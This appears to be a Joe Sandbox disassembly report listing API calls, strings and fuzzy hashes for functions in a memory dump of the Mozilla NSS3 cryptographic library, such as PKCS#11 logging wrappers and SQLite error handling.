Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 24854c5a33b2b8f3c6d025a7c83084ac1d9a85f3227a890b074eca8a1caaa820
Instruction ID: 7238a3c2d8634e7039a0024f47e71bbc4977b2063409c76109d18ec87c05062b
Opcode Fuzzy Hash: 24854c5a33b2b8f3c6d025a7c83084ac1d9a85f3227a890b074eca8a1caaa820
Instruction Fuzzy Hash: 1C51DFB5D00626ABDF01DFAAC8417AF77B4BB06349F081129DC08E7B41E331A954CBE6

Function 6CF7ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CF7ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF7AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF7AE29

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF7AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CF7AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF7AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6CF7AEA0

Strings

(CK_INVALID_HANDLE), xrefs: 6CF7AE1F, 6CF7AE80
hSession = 0x%x, xrefs: 6CF7AE01, 6CF7AE11
hKey = 0x%x, xrefs: 6CF7AE62, 6CF7AE72
C_MessageSignInit, xrefs: 6CF7ADE1

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: c3fef8db733f4493e11344e7223db37f9be411fed56a94a84fce1e93f519f93e
Instruction ID: 4c546250af3418853446c494b7aa6d0722f50d182be7baa11ea4a560df4ee71e
Opcode Fuzzy Hash: c3fef8db733f4493e11344e7223db37f9be411fed56a94a84fce1e93f519f93e
Instruction Fuzzy Hash: 7C31E972505114ABEB209B25ED44FAF37B5AB4630DF4A503AF90D5B242D734D854CBB2

Function 6CF79EE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6CF79F06
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF79F37
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF79F49

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF79F5F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CF79F98
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF79FAA
PR_LogPrint.NSS3(?,00000000), ref: 6CF79FC0

Strings

(CK_INVALID_HANDLE), xrefs: 6CF79F3F, 6CF79FA0
hSession = 0x%x, xrefs: 6CF79F21, 6CF79F31
hKey = 0x%x, xrefs: 6CF79F82, 6CF79F92
C_MessageEncryptInit, xrefs: 6CF79F01

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit
API String ID: 332880674-1139731676
Opcode ID: b1cbfc6aabe708f648c904b8f575d46442b6c9df8427438f979f8764ca2b1f64
Instruction ID: f284cb6065936412563d11556cce28c0eb3e6053bca57de18f77f83743c03602
Opcode Fuzzy Hash: b1cbfc6aabe708f648c904b8f575d46442b6c9df8427438f979f8764ca2b1f64
Instruction Fuzzy Hash: 9A31F872505204ABEB209F25ED54FEF3775AB8631DF09402AFA0D6B243DB349954CBB2

Function 6D014C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6D014CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D014CFD
sqlite3_value_text16.NSS3(?), ref: 6D014D44

Strings

bad parameter or other API misuse, xrefs: 6D014D05
another row available, xrefs: 6D014D20
no more rows available, xrefs: 6D014D2E
invalid, xrefs: 6D014CF1
out of memory, xrefs: 6D014C78, 6D014C9E
abort due to ROLLBACK, xrefs: 6D014D27, 6D014D33
unknown error, xrefs: 6D014D56
API call with %s database connection pointer, xrefs: 6D014CF6

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 973a1476c204d79064fdef74c9373dd0d78c98cd259385b0b56e2dbf3b77914e
Instruction ID: 9949c3d8c986177ff05ce2d2dced5f2e5323bb7839175b928bfea4c9fb907ef7
Opcode Fuzzy Hash: 973a1476c204d79064fdef74c9373dd0d78c98cd259385b0b56e2dbf3b77914e
Instruction Fuzzy Hash: 843157B1E0C812B7FB550AA49C10BB973A1778A31CF444025D8288B379DB65EC6187E3

Function 6CF72DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6CF72DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF72E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF72E33

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF72E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CF72E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CF72E81

Strings

pPin = 0x%p, xrefs: 6CF72E63
(CK_INVALID_HANDLE), xrefs: 6CF72E2C
hSession = 0x%x, xrefs: 6CF72E0E, 6CF72E1E
C_InitPIN, xrefs: 6CF72DF1
ulPinLen = %d, xrefs: 6CF72E7C

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 35528d4d74b31c000aaaf2abe789c9ace15d060660a45c9d8248156efc9f3fd6
Instruction ID: b92e6e4a24bc80458cb7aa3b058dc828048c7ce8f72cdc7d4f5fb6651321bcd6
Opcode Fuzzy Hash: 35528d4d74b31c000aaaf2abe789c9ace15d060660a45c9d8248156efc9f3fd6
Instruction Fuzzy Hash: EF310472905114EBEB209B26ED58F9F3775EB4631CF094026F90CA7253DB319948CBB2

Function 6CF76EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CF76F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF76F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF76F53

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF76F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CF76F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CF76FA1

Strings

pPart = 0x%p, xrefs: 6CF76F83
(CK_INVALID_HANDLE), xrefs: 6CF76F4C
hSession = 0x%x, xrefs: 6CF76F2E, 6CF76F3E
ulPartLen = %d, xrefs: 6CF76F9C
C_DigestUpdate, xrefs: 6CF76F11

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 97032ed20f0b1033c7245e025f099dd84ecaeefb47a83d4f7782badf34d5e4f8
Instruction ID: ca74306422a9a12a60b7f7bda76b0eadd39bc55ff6645209e8cf955236867103
Opcode Fuzzy Hash: 97032ed20f0b1033c7245e025f099dd84ecaeefb47a83d4f7782badf34d5e4f8
Instruction Fuzzy Hash: 0E31C175605514ABEB209B35ED58F9E37B5EB82318F494036F90CA7253EB30D948CAB1

Function 6D012D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6D012D9F

Part of subcall function 6CECCA30: EnterCriticalSection.KERNEL32(?,?,?,6CF2F9C9,?,6CF2F4DA,6CF2F9C9,?,?,6CEF369A), ref: 6CECCA7A
Part of subcall function 6CECCA30: LeaveCriticalSection.KERNEL32(?), ref: 6CECCB26

sqlite3_exec.NSS3(?,?,6D012F70,?,?), ref: 6D012DF9
sqlite3_free.NSS3(00000000), ref: 6D012E2C
sqlite3_free.NSS3(?), ref: 6D012E3A
sqlite3_free.NSS3(?), ref: 6D012E52
sqlite3_mprintf.NSS3(6D07AAF9,?), ref: 6D012E62
sqlite3_free.NSS3(?), ref: 6D012E70
sqlite3_free.NSS3(?), ref: 6D012E89
sqlite3_free.NSS3(?), ref: 6D012EBB
sqlite3_free.NSS3(?), ref: 6D012ECB
sqlite3_free.NSS3(00000000), ref: 6D012F3E
sqlite3_free.NSS3(?), ref: 6D012F4C

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: a574ccd3b07e7c8b849024d926f521e8243d9960e7f1bf09ee599f855830b1c7
Instruction ID: c158a7a505712fc52dd4fee54d649ff4a4263a14199071b12bbab52af9f06656
Opcode Fuzzy Hash: a574ccd3b07e7c8b849024d926f521e8243d9960e7f1bf09ee599f855830b1c7
Instruction Fuzzy Hash: 3D615EB5E042068BEB10CFB4D882BAE77F1BF5A348F114028DD55A7341E735E855CBA1

Function 6CF62C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CF63F23,?,6CF5E477,?,?,?,00000001,00000000,?,?,6CF63F23,?), ref: 6CF62C62
EnterCriticalSection.KERNEL32(0000001C,?,6CF5E477,?,?,?,00000001,00000000,?,?,6CF63F23,?), ref: 6CF62C76
PL_HashTableLookup.NSS3(00000000,?,?,6CF5E477,?,?,?,00000001,00000000,?,?,6CF63F23,?), ref: 6CF62C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CF5E477,?,?,?,00000001,00000000,?,?,6CF63F23,?), ref: 6CF62C93

Part of subcall function 6CFEDD70: TlsGetValue.KERNEL32 ref: 6CFEDD8C
Part of subcall function 6CFEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CFEDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CF5E477,?,?,?,00000001,00000000,?,?,6CF63F23,?), ref: 6CF62CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CF5E477,?,?,?,00000001,00000000,?,?,6CF63F23,?), ref: 6CF62CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CF5E477,?,?,?,00000001,00000000,?,?,6CF63F23), ref: 6CF62CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CF5E477,?,?,?,00000001,00000000,?), ref: 6CF62CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CF5E477,?,?,?,00000001,00000000,?), ref: 6CF62D4D
EnterCriticalSection.KERNEL32(?), ref: 6CF62D61
PL_HashTableLookup.NSS3(?,?), ref: 6CF62D71
PR_Unlock.NSS3(?), ref: 6CF62D7E

Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307AD
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307CD
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307D6
Part of subcall function 6CF307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CEC204A), ref: 6CF307E4
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,6CEC204A), ref: 6CF30864
Part of subcall function 6CF307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CF30880
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,6CEC204A), ref: 6CF308CB
Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(?,?,6CEC204A), ref: 6CF308D7
Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(?,?,6CEC204A), ref: 6CF308FB

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 3b246936a19de1f5d1f2950763a2f77f798ee3c569ebf97ab862114479aa4cd9
Instruction ID: 42f5c47ab41ea1a6f114669b52bfa32ae83105b706591ce5fac2249984459098
Opcode Fuzzy Hash: 3b246936a19de1f5d1f2950763a2f77f798ee3c569ebf97ab862114479aa4cd9
Instruction Fuzzy Hash: FE51F9B6C00505ABDB009F25DC45AAAB778FF1935CB148524ED189BF12EB32ED64C7E1

Function 6CF57C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6D0A2120,Function_00097E60,00000000,?,?,?,?,6CFD067D,6CFD1C60,00000000), ref: 6CF57C81

Part of subcall function 6CEC4C70: TlsGetValue.KERNEL32(?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4C97
Part of subcall function 6CEC4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4CB0
Part of subcall function 6CEC4C70: PR_Unlock.NSS3(?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4CC9

TlsGetValue.KERNEL32 ref: 6CF57CA0
EnterCriticalSection.KERNEL32(?), ref: 6CF57CB4
PR_Unlock.NSS3 ref: 6CF57CCF

Part of subcall function 6CFEDD70: TlsGetValue.KERNEL32 ref: 6CFEDD8C
Part of subcall function 6CFEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CFEDDB4

TlsGetValue.KERNEL32 ref: 6CF57D04
EnterCriticalSection.KERNEL32(?), ref: 6CF57D1B
realloc.MOZGLUE(-00000050), ref: 6CF57D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF57DF4
PR_Unlock.NSS3 ref: 6CF57E0E

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: f5862fbbd9c73148e593d6bfff9c12a8b319aef5c70cd8529663d263f7e5d039
Instruction ID: 33415d602f60735838a5b3eb34ce495919c1408ed9c935a1a5fb0b591735e9b2
Opcode Fuzzy Hash: f5862fbbd9c73148e593d6bfff9c12a8b319aef5c70cd8529663d263f7e5d039
Instruction Fuzzy Hash: 1251F8B1915600AFDB119F35CC50B6A77B5FB66318F59913BEF044B712EB309461CB81

Function 6CEC4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4CB0
PR_Unlock.NSS3(?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4D97
PR_Lock.NSS3(?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4DBA
PR_WaitCondVar.NSS3 ref: 6CEC4DD4
PR_Unlock.NSS3(?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4DEF

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 671a7784971a222727e1f343e9a9b2f2ddeea842bd124f0a6d5fa268b15d4f88
Instruction ID: 668315dc66164ed35621a40d9d5dc07c1582327ae62c5dc298cb15c33ed0f9a7
Opcode Fuzzy Hash: 671a7784971a222727e1f343e9a9b2f2ddeea842bd124f0a6d5fa268b15d4f88
Instruction Fuzzy Hash: 60418DB1A04A158FDB00BF78D59466DBBF4BF06318F1A466AD858DB711E7309881CB82

Function 6D057CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6D057CE0

Part of subcall function 6D009BF0: TlsGetValue.KERNEL32(?,?,?,6D050A75), ref: 6D009C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D057D36
PR_Realloc.NSS3(?,00000080), ref: 6D057D6D
PR_GetCurrentThread.NSS3 ref: 6D057D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6D057DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D057DD8
malloc.MOZGLUE(00000080), ref: 6D057DF8
PR_GetCurrentThread.NSS3 ref: 6D057E06

Strings

:%s:%d:0x%lx, xrefs: 6D057DB9
NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6D057DF0

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: 783b8cf996a6420269f261bc136dbfcddd3f405148acdfcd6c3c4d9e9501c6e9
Instruction ID: 766ab84b7ed588240cda54b303eafb7f18fc4b956fbd2dacc643a3c30adb55fb
Opcode Fuzzy Hash: 783b8cf996a6420269f261bc136dbfcddd3f405148acdfcd6c3c4d9e9501c6e9
Instruction Fuzzy Hash: E84182B1D00205AFEB04CF29DE90A7A3BB6BF84314B158568ED198B251D731E865DBA1

Function 6CF8ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CF8DE64), ref: 6CF8ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF8ED22

Part of subcall function 6CF9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0718D0,?), ref: 6CF9B095

PL_FreeArenaPool.NSS3(?), ref: 6CF8ED4A
PL_FinishArenaPool.NSS3(?), ref: 6CF8ED6B
PR_CallOnce.NSS3(6D0A2AA4,6CFA12D0), ref: 6CF8ED38

Part of subcall function 6CEC4C70: TlsGetValue.KERNEL32(?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4C97
Part of subcall function 6CEC4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4CB0
Part of subcall function 6CEC4C70: PR_Unlock.NSS3(?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CF8ED52
PR_CallOnce.NSS3(6D0A2AA4,6CFA12D0), ref: 6CF8ED83
PL_FreeArenaPool.NSS3(?), ref: 6CF8ED95
PL_FinishArenaPool.NSS3(?), ref: 6CF8ED9D

Part of subcall function 6CFA64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CFA127C,00000000,00000000,00000000), ref: 6CFA650E

Strings

